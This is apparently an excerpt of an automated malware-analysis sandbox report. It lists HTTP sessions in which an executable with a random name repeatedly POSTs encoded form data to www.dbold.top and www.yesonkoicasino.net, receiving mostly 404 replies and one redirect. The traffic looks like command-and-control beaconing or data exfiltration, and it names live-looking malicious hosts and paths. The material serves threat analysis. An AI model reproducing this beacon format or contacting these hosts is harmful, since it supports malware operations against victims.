                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.550004209.74.64.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:01.794235945 CEST806OUTPOST /akfs/ HTTP/1.1
                                                                                  Host: www.dbold.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.dbold.top
                                                                                  Referer: http://www.dbold.top/akfs/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 67 53 46 56 57 75 51 45 4e 6f 62 4c 34 59 59 77 6a 46 73 73 78 6c 56 4e 59 35 2b 52 67 55 66 43 4a 4e 53 34 2f 44 6b 4f 53 70 53 6e 31 62 36 56 37 43 4c 49 64 51 59 6e 53 70 56 34 72 79 39 74 44 79 62 47 6a 44 39 65 4a 35 32 73 2b 4c 39 38 70 57 6b 6b 59 51 46 68 4a 48 2b 4d 66 53 52 62 71 75 32 34 62 61 48 68 31 43 51 54 34 34 45 6e 65 6d 38 68 63 41 64 65 61 76 33 69 68 6d 2b 7a 67 74 70 54 4f 78 71 37 30 75 68 2f 50 41 38 4a 31 35 6c 33 61 38 5a 50 4f 4c 67 56 44 6f 61 54 39 2f 42 39 36 66 31 2b 52 57 35 77 6d 35 70 5a 57 4c 70 6a 2f 42 63 71 6a 34 56 72 30 79 53 73 6b 42 79 4e 4b 44 4c 39 46 70 47 57 44 4a 48 31 4f 6d 66 38 59 46 50 47 4c 59 65 4f
                                                                                  Data Ascii: v2x4if=gSFVWuQENobL4YYwjFssxlVNY5+RgUfCJNS4/DkOSpSn1b6V7CLIdQYnSpV4ry9tDybGjD9eJ52s+L98pWkkYQFhJH+MfSRbqu24baHh1CQT44Enem8hcAdeav3ihm+zgtpTOxq70uh/PA8J15l3a8ZPOLgVDoaT9/B96f1+RW5wm5pZWLpj/Bcqj4Vr0ySskByNKDL9FpGWDJH1Omf8YFPGLYeO
                                                                                  Oct 7, 2024 15:07:02.380295038 CEST533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 07 Oct 2024 13:07:02 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.550005209.74.64.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:04.866312981 CEST1823OUTPOST /akfs/ HTTP/1.1
                                                                                  Host: www.dbold.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.dbold.top
                                                                                  Referer: http://www.dbold.top/akfs/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 67 53 46 56 57 75 51 45 4e 6f 62 4c 34 59 59 77 6a 46 73 73 78 6c 56 4e 59 35 2b 52 67 55 66 43 4a 4e 53 34 2f 44 6b 4f 53 70 71 6e 31 6f 79 56 37 6b 44 49 63 51 59 6e 62 4a 56 39 72 79 38 78 44 7a 7a 4b 6a 44 41 72 4a 2f 36 73 38 74 68 38 76 6b 4d 6b 54 51 46 68 42 6e 2b 4e 43 43 51 66 71 75 47 43 62 5a 2f 68 31 43 51 54 34 37 4d 6e 49 48 38 68 50 77 64 64 64 76 33 75 6c 6d 2b 50 67 70 46 44 4f 77 72 41 30 64 70 2f 50 6b 63 4a 6d 72 4e 33 53 38 5a 4e 44 72 67 37 44 6f 57 4d 39 2f 74 35 36 65 78 41 52 55 70 77 6b 63 45 7a 53 72 35 4d 6d 78 41 39 73 2f 46 57 31 33 71 35 6e 77 75 33 44 55 37 31 41 5a 4f 44 44 75 58 66 41 56 71 58 47 79 33 72 4a 65 33 42 7a 58 51 50 75 78 54 34 45 70 70 2b 48 70 6a 34 57 30 69 61 43 59 62 36 50 37 58 4d 61 32 53 53 66 45 72 69 69 2b 65 6d 79 31 53 6c 5a 44 31 4c 5a 67 35 66 49 2f 4d 67 52 4b 32 48 45 6e 59 6f 58 4d 4b 68 46 6e 56 4c 6a 68 55 38 74 41 38 30 2f 49 52 57 31 45 54 2f 76 33 2f 35 72 4f 47 45 35 77 6e 42 61 30 53 6b 58 47 64 6e 6b 64 52 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=gSFVWuQENobL4YYwjFssxlVNY5+RgUfCJNS4/DkOSpqn1oyV7kDIcQYnbJV9ry8xDzzKjDArJ/6s8th8vkMkTQFhBn+NCCQfquGCbZ/h1CQT47MnIH8hPwdddv3ulm+PgpFDOwrA0dp/PkcJmrN3S8ZNDrg7DoWM9/t56exARUpwkcEzSr5MmxA9s/FW13q5nwu3DU71AZODDuXfAVqXGy3rJe3BzXQPuxT4Epp+Hpj4W0iaCYb6P7XMa2SSfErii+emy1SlZD1LZg5fI/MgRK2HEnYoXMKhFnVLjhU8tA80/IRW1ET/v3/5rOGE5wnBa0SkXGdnkdRKSuvHi+HzZS/lC4JpKKXi5R9V8uYhPJz1yJ5mndRzNWjOmmJ019CkNBzC0Y/sUktNoe95hu2FTOAA3OswvzHPhNH2E6lXX41zq3mkv3LCsDF01/nYMTxeAZtQxIJRr6q25ybLdfhq/9HM9sxQ1LYtodUGdTa3HRFMb5cEF5Yno1HKxodx8ZPDlXn/G7A73VnWiZ0twXbQIadGTJr7s0uQZN/lUXhspfalFzIy91VJZc4Eam+JHNLghrl6UBSIgjAga33coVABbUjFqLgDyrh4Mla9tRdbdD02WXcsMW551baCVqJmBzTp/y3NvRkOQs+vMe2zxVoNNUi4NikAh1qtAEuuR4XDX027sfiEahJrs0Red4Lqx6DTpX+pqAaogVla/qbd6gxQ2/mST32uWPRumIyqTINyMLWbxj8IHSlOUY/uYiZXnYfSk2bUNjljh1DrFOAIx/8wYw8ndoz3fh7NuV8r0B4laQ9pYZwcYE+ieguWYclbKMNRKGNykXXAyyUTMMrmQVIOF6+fWR8fqaBWtDXaOEsg2db5VJqf3LiHmBvkQdlLEMOo7S/j12ee+e4D0R3y+ZnBnMBa7FYJscC5rvdO8/E7/kwnIl8iSqlE1v0GP6uIskgzEpqnmVf93UsPnUOb9CwrdxBnnEjgvN4cugl1q32tEa6be [TRUNCATED]
                                                                                  Oct 7, 2024 15:07:05.410839081 CEST533INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 07 Oct 2024 13:07:05 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  28192.168.2.550006209.74.64.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:07.407721043 CEST544OUTGET /akfs/?bTU8=BDEpwP48zFO0YTL&v2x4if=tQt1VegNQ83I/PkzpW4pixplOMmFsmLQV7CNzDc4AJLZ1rC45yyod1A8fM9wkU09LD6plA5ueuCxrN9t2nRdOlhdNmqsJyRbv4nvYJOkkxov+L8TZEddOhFkQZ7NwS7+6w== HTTP/1.1
                                                                                  Host: www.dbold.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:07:08.196773052 CEST548INHTTP/1.1 404 Not Found
                                                                                  Date: Mon, 07 Oct 2024 13:07:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  29192.168.2.5500073.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:13.283814907 CEST813OUTPOST /au3y/ HTTP/1.1
                                                                                  Host: www.yesonkoicasino.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.yesonkoicasino.net
                                                                                  Referer: http://www.yesonkoicasino.net/au3y/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 207
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4d 45 76 42 66 45 4e 62 58 66 66 2f 57 44 30 6a 35 41 6c 37 30 32 4c 34 53 78 71 64 4c 74 4c 72 36 4a 36 38 78 79 31 59 36 63 50 4b 57 44 73 38 76 32 62 71 7a 48 54 6c 48 30 37 46 5a 4a 78 6e 6a 4c 54 6a 2b 34 52 41 72 42 33 64 6a 61 65 2b 36 2f 4d 4f 6e 78 64 56 2f 47 77 49 6b 5a 30 6c 51 49 31 6d 6b 58 30 36 68 2f 76 75 4b 6b 4c 46 48 6e 6a 6b 6f 57 45 33 35 43 57 73 50 44 69 4a 59 34 37 45 47 6f 32 54 41 75 6b 2b 56 47 4a 30 6e 6c 6f 59 44 45 37 30 46 56 6c 31 38 4a 68 6c 65 76 36 4b 7a 42 65 78 55 53 4e 52 7a 77 78 72 74 33 6a 49 6b 6a 6d 6c 77 4c 2b 53 6d 76 6b 63 6a 6b 4e 43 73 39 6f 3d
                                                                                  Data Ascii: v2x4if=MEvBfENbXff/WD0j5Al702L4SxqdLtLr6J68xy1Y6cPKWDs8v2bqzHTlH07FZJxnjLTj+4RArB3djae+6/MOnxdV/GwIkZ0lQI1mkX06h/vuKkLFHnjkoWE35CWsPDiJY47EGo2TAuk+VGJ0nloYDE70FVl18Jhlev6KzBexUSNRzwxrt3jIkjmlwL+SmvkcjkNCs9o=


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.5500083.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:15.830452919 CEST833OUTPOST /au3y/ HTTP/1.1
                                                                                  Host: www.yesonkoicasino.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.yesonkoicasino.net
                                                                                  Referer: http://www.yesonkoicasino.net/au3y/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 227
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4d 45 76 42 66 45 4e 62 58 66 66 2f 57 67 38 6a 31 48 52 37 39 32 4c 37 64 52 71 64 53 39 4c 6e 36 4a 32 38 78 7a 68 49 36 75 62 4b 58 6e 6f 38 6f 43 76 71 2f 6e 54 6c 4a 55 37 4b 54 70 78 38 6a 4c 66 42 2b 39 35 41 72 42 6a 64 6a 62 75 2b 36 4d 6b 4e 68 78 64 58 6b 57 77 4b 35 4a 30 6c 51 49 31 6d 6b 58 67 51 68 2f 6e 75 4b 31 37 46 56 54 2f 6e 30 47 45 34 2b 43 57 73 4c 44 69 33 59 34 36 72 47 70 36 71 41 6f 67 2b 56 48 35 30 6d 78 38 62 4a 45 36 39 42 56 6b 42 77 4d 45 54 48 75 4f 4b 32 6a 50 45 42 6a 31 2f 37 6d 63 42 33 56 72 67 33 44 4b 64 67 59 32 6c 33 66 46 31 35 48 64 79 79 71 38 6b 6f 61 30 74 71 4b 49 42 43 72 5a 63 66 59 32 4a 7a 32 48 2b
                                                                                  Data Ascii: v2x4if=MEvBfENbXff/Wg8j1HR792L7dRqdS9Ln6J28xzhI6ubKXno8oCvq/nTlJU7KTpx8jLfB+95ArBjdjbu+6MkNhxdXkWwK5J0lQI1mkXgQh/nuK17FVT/n0GE4+CWsLDi3Y46rGp6qAog+VH50mx8bJE69BVkBwMETHuOK2jPEBj1/7mcB3Vrg3DKdgY2l3fF15Hdyyq8koa0tqKIBCrZcfY2Jz2H+


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.5500093.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:18.465363026 CEST1850OUTPOST /au3y/ HTTP/1.1
                                                                                  Host: www.yesonkoicasino.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Origin: http://www.yesonkoicasino.net
                                                                                  Referer: http://www.yesonkoicasino.net/au3y/
                                                                                  Connection: close
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1243
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Data Raw: 76 32 78 34 69 66 3d 4d 45 76 42 66 45 4e 62 58 66 66 2f 57 67 38 6a 31 48 52 37 39 32 4c 37 64 52 71 64 53 39 4c 6e 36 4a 32 38 78 7a 68 49 36 75 44 4b 58 53 38 38 72 6c 7a 71 78 48 54 6c 58 45 36 4e 54 70 78 78 6a 50 37 46 2b 39 31 36 72 43 62 64 68 35 4b 2b 38 39 6b 4e 79 52 64 58 74 32 77 4c 6b 5a 30 77 51 49 6b 68 6b 58 77 51 68 2f 6e 75 4b 32 54 46 57 48 6a 6e 6b 32 45 33 35 43 57 6f 50 44 69 4d 59 34 7a 63 47 70 75 36 42 59 41 2b 55 6e 70 30 67 48 41 62 46 45 36 2f 47 56 6b 5a 77 4d 41 41 48 75 69 38 32 69 37 71 42 6b 52 2f 71 41 4a 37 73 56 71 38 6b 7a 61 48 6b 34 65 6d 6d 61 39 50 35 33 41 41 35 4e 45 61 6c 37 30 76 6b 66 6f 36 4f 4b 59 5a 4c 4d 4f 49 36 77 57 4f 77 52 7a 56 2f 4b 6d 7a 49 79 74 71 59 42 50 77 43 76 6e 38 6b 37 4c 32 37 69 36 39 72 56 36 64 44 53 48 4a 47 39 4b 74 78 57 74 62 63 77 66 65 44 39 35 76 44 57 46 63 64 6e 65 33 30 6a 4e 77 58 49 69 2f 44 69 49 44 2f 39 63 65 31 4a 67 6f 39 57 64 70 7a 4e 6a 73 58 79 5a 31 71 62 7a 78 72 67 76 4c 2f 75 73 2f 5a 62 6a 51 31 32 62 [TRUNCATED]
                                                                                  Data Ascii: v2x4if=MEvBfENbXff/Wg8j1HR792L7dRqdS9Ln6J28xzhI6uDKXS88rlzqxHTlXE6NTpxxjP7F+916rCbdh5K+89kNyRdXt2wLkZ0wQIkhkXwQh/nuK2TFWHjnk2E35CWoPDiMY4zcGpu6BYA+Unp0gHAbFE6/GVkZwMAAHui82i7qBkR/qAJ7sVq8kzaHk4emma9P53AA5NEal70vkfo6OKYZLMOI6wWOwRzV/KmzIytqYBPwCvn8k7L27i69rV6dDSHJG9KtxWtbcwfeD95vDWFcdne30jNwXIi/DiID/9ce1Jgo9WdpzNjsXyZ1qbzxrgvL/us/ZbjQ12bYyWZR2zaTuneV5TGp05OUkW/lCjdlKkq10lkNElqcYQvGJVriUKTCeBOh8rwR/Fc1TSnL9hltEku9ImNFpSipu3f5+RK3emLIirRPM8xlaPzHRAc4qJ1q15RH3NLjypUOPjYdNHr7RsmXXOiea8C1hl7KTND9387BLn2ScZQGKZv9LIDdfMGJAtm+GomnuXoyGyii2t+vJc34HP1FBynWWJ2Jv3B1JgUXGBzQFvIMIUYVJTp7zTF4Q0nHbcct4K0z7oFSaSVgT6c7QgV1/d4tpfI878DjbxfyisvsjDVgM5JL9x1I/YyR2khN19Yvh2fDwBpK7Lbpzemad0RV3hqJf+cH+TCM4x8IO2JxEO0pUvGzcfiW4/qXETesAXfmL08F3wKScbp0zNexkgW2v3kD9sEZ5Z+9EfhkpE8093ryJRECkrto690qqiA/rmYgCw/9K8rqMkVD5GCeKGDk5LaQ7fWlbFWZcicpd+72xEIoH2OdNZZcnl5olg7cfSB72gcpR7BIuZKPvXbXpggc9+wa0dCO+jlEHZsZjYBQtSRAlemMzx3wvd0mFYm3clgt+bAG5wrcGH+oznl8hxyamPOdRqMeqhCEp+1LFbiqoy1g/3ZZjFTSVbv9UcUI86DhE5XBMgmVeEJJKKcXhyNHVVmKnTtyPtEU8EkNf [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.5500103.33.130.190801220C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Oct 7, 2024 15:07:21.012814999 CEST553OUTGET /au3y/?v2x4if=BGHhcy5EGJH3TGsr0SdAyB/IY0TJfM6b0Iyf+x5ct/zMbQAi/VOw0CHGLkWqXJ1uj5ygw+VfiH3h5t6lg/ZXmjp4gFIYwdA6QsklqXxg8umNXWH5XR+T10UE2xCqQBbuLw==&bTU8=BDEpwP48zFO0YTL HTTP/1.1
                                                                                  Host: www.yesonkoicasino.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FirePHP/4Chrome
                                                                                  Oct 7, 2024 15:07:21.443916082 CEST415INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Mon, 07 Oct 2024 13:07:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 76 32 78 34 69 66 3d 42 47 48 68 63 79 35 45 47 4a 48 33 54 47 73 72 30 53 64 41 79 42 2f 49 59 30 54 4a 66 4d 36 62 30 49 79 66 2b 78 35 63 74 2f 7a 4d 62 51 41 69 2f 56 4f 77 30 43 48 47 4c 6b 57 71 58 4a 31 75 6a 35 79 67 77 2b 56 66 69 48 33 68 35 74 36 6c 67 2f 5a 58 6d 6a 70 34 67 46 49 59 77 64 41 36 51 73 6b 6c 71 58 78 67 38 75 6d 4e 58 57 48 35 58 52 2b 54 31 30 55 45 32 78 43 71 51 42 62 75 4c 77 3d 3d 26 62 54 55 38 3d 42 44 45 70 77 50 34 38 7a 46 4f 30 59 54 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
